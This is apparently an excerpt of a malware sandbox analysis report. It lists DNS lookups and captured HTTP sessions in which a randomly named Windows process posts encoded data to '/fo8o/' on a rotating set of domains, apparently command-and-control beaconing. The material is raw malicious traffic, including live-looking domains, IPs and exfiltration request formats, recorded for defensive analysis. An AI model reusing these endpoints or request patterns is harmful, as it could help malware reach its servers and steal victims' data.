                                                    Jun 9, 2024 18:01:52.321110010 CEST1.1.1.1192.168.2.110x3885No error (0)www.donnavariedades.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                    Jun 9, 2024 18:01:52.321110010 CEST1.1.1.1192.168.2.110x3885No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:06.166100025 CEST1.1.1.1192.168.2.110xcb1cNo error (0)www.660danm.top34.111.148.214A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:06.166100025 CEST1.1.1.1192.168.2.110xcb1cNo error (0)www.660danm.top34.120.249.181A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:19.832824945 CEST1.1.1.1192.168.2.110x4bc4No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                    Jun 9, 2024 18:02:19.832824945 CEST1.1.1.1192.168.2.110x4bc4No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:33.340080023 CEST1.1.1.1192.168.2.110x8c07Server failure (2)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:41.479162931 CEST1.1.1.1192.168.2.110xd73Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:49.563745022 CEST1.1.1.1192.168.2.110x3cefNo error (0)www.shenzhoucui.com104.206.198.212A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:03:03.310996056 CEST1.1.1.1192.168.2.110x6563No error (0)www.b301.space194.58.112.174A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.3xfootball.com
                                                    • www.kasegitai.tokyo
                                                    • www.goldenjade-travel.com
                                                    • www.antonio-vivaldi.mobi
                                                    • www.magmadokum.com
                                                    • www.rssnewscast.com
                                                    • www.techchains.info
                                                    • www.elettrosistemista.zip
                                                    • www.donnavariedades.com
                                                    • www.660danm.top
                                                    • www.empowermedeco.com
                                                    • www.shenzhoucui.com
                                                    • www.b301.space

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.1149711154.215.72.110806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 17:59:49.461067915 CEST506OUTGET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.3xfootball.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 17:59:50.418404102 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 15:59:50 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.1149712202.172.28.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:06.192022085 CEST779OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 4f 76 2f 78 70 73 6d 4c 4d 41 46 48 55 74 45 6a 32 6f 50 6a 43 64 33 45 42 51 62 2f 41 4c 52 41 3d 3d
                                                    Data Ascii: Zl4h1=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2Ov/xpsmLMAFHUtEj2oPjCd3EBQb/ALRA==
                                                    Jun 9, 2024 18:00:07.068464994 CEST360INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:06 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.1149713202.172.28.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:08.733159065 CEST799OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 4b 66 6a 69 67 67 53 4f 6c 43 4b 4d 5a 66 4e 68 56 33 6f 39 49 68 6e 54 65 53 52 76 49 54 58 39 30 3d
                                                    Data Ascii: Zl4h1=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwKfjiggSOlCKMZfNhV3o9IhnTeSRvITX90=
                                                    Jun 9, 2024 18:00:09.618321896 CEST360INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:09 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.1149714202.172.28.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:11.269473076 CEST1812OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 44 7a 61 66 57 4f 43 37 6b 6b 53 4e 50 56 7a 48 2b 49 67 4b 6a 68 7a 72 62 63 53 6f 78 33 6e 57 64 73 70 41 37 64 62 4e 47 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 74 71 6c 33 59 58 64 63 4f 77 63 62 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e 64 36 32 [TRUNCATED]
                                                    Data Ascii: Zl4h1=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLI/AXduFDzafWOC7kkSNPVzH+IgKjhzrbcSox3nWdspA7dbNGN53b6xc/qIFjIMwryHzLWQuxoaUUJomOEQ54yK9cBUn1GcN41Fp/DMsC8DNlzTtql3YXdcOwcbsRasabKChVpdNuEzfYSztAGHImevjwiq59QyNd62bitKpXw4Rg4jW10WzlGrck9QbkLhOrwwFuohgJWuuRqDV8voiIwA29At+yaUGM6yP6vu/0a+4CZFOk17nUBy6YWhF/zFH325bdVjKEb3AG0hcXj0T0CCq9YLRVVKtl1oU8j6UHNpmM4oz9Er01tsuaW+jznBCGlw9a3E3CaXRrjVi3kRandDEK4Stl8HVTl896dWx2usRfFtDH5G8Hmf7toBa3hvY3OWoZ3WPy06UE647nfFUyayy0M/K2whWbvo5nLsxCfqx/8yF78+p04s2FIGnVOKgmrBhhz7KeZSsJum+S+XRgy4EaTqYVVHmgqXqKJcaq6DOASYSMGjdfgLJc+b9IbNBWmv8WRC8n3NlovoUdIl2WuFR/aph71EGH9lWybVuW5eK4UwPUFGOWB8Hzl1aUsFTqvkjBCNc5qeH1M2KCAzgxiPlR8s1tDAwALK1VzPjqEBx/cOMK7he+sxIFlvTH/X1NhYNz55Tnxc96EmwKwbA3Fz8bQ0pfxq9i0j7K322riFDQn/d6fb55oP+Sx92C65zZcnw+pNklHvIfwAJSGvvEfcGg5nXfeY7MDEM8xJ/x3yWx0OSG2Aiot9mDwrBZOHxfLRQ9xJQNU4cNM8ic4eDdPD6ktCQn8soKAAyLvZggjd3lX+UGvJDMz3ABUpv5NUC6MHfh [TRUNCATED]
                                                    Jun 9, 2024 18:00:12.141779900 CEST360INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:12 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.1149715202.172.28.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:13.800039053 CEST507OUTGET /fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.kasegitai.tokyo
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:00:14.673310995 CEST360INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:14 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.1149717116.50.37.244806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:21.000495911 CEST797OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.goldenjade-travel.com
                                                    Origin: http://www.goldenjade-travel.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 7a 4e 6b 71 64 71 73 48 6e 59 57 6a 72 30 4f 47 34 69 4f 6a 54 77 41 52 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                    Data Ascii: Zl4h1=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPzNkqdqsHnYWjr0OG4iOjTwARZZMNmPWg==
                                                    Jun 9, 2024 18:00:22.126542091 CEST599INHTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:21 GMT
                                                    Connection: close
                                                    Content-Length: 156
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.1149718116.50.37.244806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:23.549029112 CEST817OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.goldenjade-travel.com
                                                    Origin: http://www.goldenjade-travel.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 62 79 55 33 34 70 46 38 44 47 4e 6b 77 72 32 43 4d 4b 38 45 31 41 34 37 34 36 67 70 45 6a 72 56 55 3d
                                                    Data Ascii: Zl4h1=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyU34pF8DGNkwr2CMK8E1A4746gpEjrVU=
                                                    Jun 9, 2024 18:00:24.699737072 CEST599INHTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:23 GMT
                                                    Connection: close
                                                    Content-Length: 156
